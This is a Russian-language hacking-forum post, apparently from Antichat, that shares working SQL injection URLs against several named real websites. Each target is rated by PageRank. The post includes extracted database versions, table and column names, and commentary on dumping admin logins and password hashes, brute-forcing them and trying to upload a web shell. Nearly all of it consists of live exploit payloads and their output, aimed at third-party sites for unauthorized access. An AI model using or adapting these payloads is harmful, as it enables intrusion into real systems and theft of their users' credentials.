|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Код:
http://mercury.odessa.ua/details/32664%20union%20select%201,2,3,concat_ws%280x3a,version%28%29,database%28%29,user%28%29,@@version_compile_os%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23/
5.0.45:AllOde:WebSite@localhost:redhat-linux-gnu
БД
information_schema:AllOde:Evgen:dbwap:jom_:luzanov ka_db:mysqlds17
PosOut:anketa:banners:extr:groups:job_rel:klvidjob :kodsng:kodukr:kodword:link_anketa:marshrut:messag e:navigator:newseoplehoneosin:rubricator:street:st ruode:tamoj:txtvals:user_info:vlastukr
user_info
id_user:name_userass_user:copy_password:mail_user: icq_userhone_user:url_user:city_user:firm_user:inf o_user
Код:
http://mercury.odessa.ua/details/32664 union select 1,2,3,concat_ws(0x3a,name_user,pass_user),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 FROM user_info limit 0,1/
Код:
http://mercury.odessa.ua/details/32664%20union%20select%201,2,3,aes_decrypt%28aes_encrypt%28pass_user,1%29,1%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20FROM%20user_info%20limit%201,1/
http://turniere.govb.de/bbc/ - тут pr0, а тут уже http://turniere.govb.de pr4 и тиц10
Через ошибку узнаем префикс таблиц со схемы это bbc_
Вытаскиваем данные 1-ого админа:
Код:
http://turniere.govb.de/bbc/e107_plugins/registration/playerlist.php?order=1,%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28select%20user_loginname%20from%20bbc_user%20limit%200,1%29,0x3a,%28select%20user_password%20from%20bbc_user%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%29%29
Пасс сложный.
Вытаскиваем 2-ого админа:
Код:
http://turniere.govb.de/bbc/e107_plugins/registration/playerlist.php?order=1,%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28select%20user_loginname%20from%20bbc_user%20where%20user_admin=1%20limit%201,1%29,0x3a,%28select%20user_password%20from%20bbc_user%20limit%201,1%29,0x3a,floor%28rand%280%29*2%29%29%29
Пасс легко брутабельный.
Но в админке прав нет, шелл не залит.
pr3
Код:
http://psphungary.hu/e107_plugins/nboard/nboard.php?cat=1%29%20and%201=%28select%201%20from%20%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28select%20%20concat_ws%280x3a,user_loginname,user_password%29%20from%20e107_user%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%29%29y%29--+
Админка другая, шелл не залит.
pr2
Код:
http://www.kirovfishing.ru/e107_plugins/nboard/nboard.php?cat=1) and 1=(select 1 from (select count(*) from (select 1 union select 2 union select 3)x group by concat((select concat_ws(0x3a,user_loginname,user_password) from e107_user limit 0,1),0x3a,floor(rand(0)*2)))y)--+
Прав нет, шелл не залит.
pr1
Код:
http://bagazniki.com.ua/index.php?id=688+and+%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28version%28%29,floor%28rand%280%29*2%29%29%29
pr4
Код:
http://www.pogoda.ua/index.php?id=4+and+0+union+select+1,concat_ws%280x3a,login,password%29,3,4,5+from+users+limit+0,1--+
pr3 => голубые заставили к кодировке нужной привести
Код:
http://www.menoboy.com/repertoire-videos-gays/extrait-video-gay.php?id=269+union+select+1,2,3,4,5,6,7,unhex%28hex%28concat_ws%280x3a,version%28%29,user%28%29,database%28%29,@@version_compile_os%29%29%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43--+
4.1.11:db1@localhost:db1:mandrake-linux-gnu
сори мб есть баян времени нет проверить. |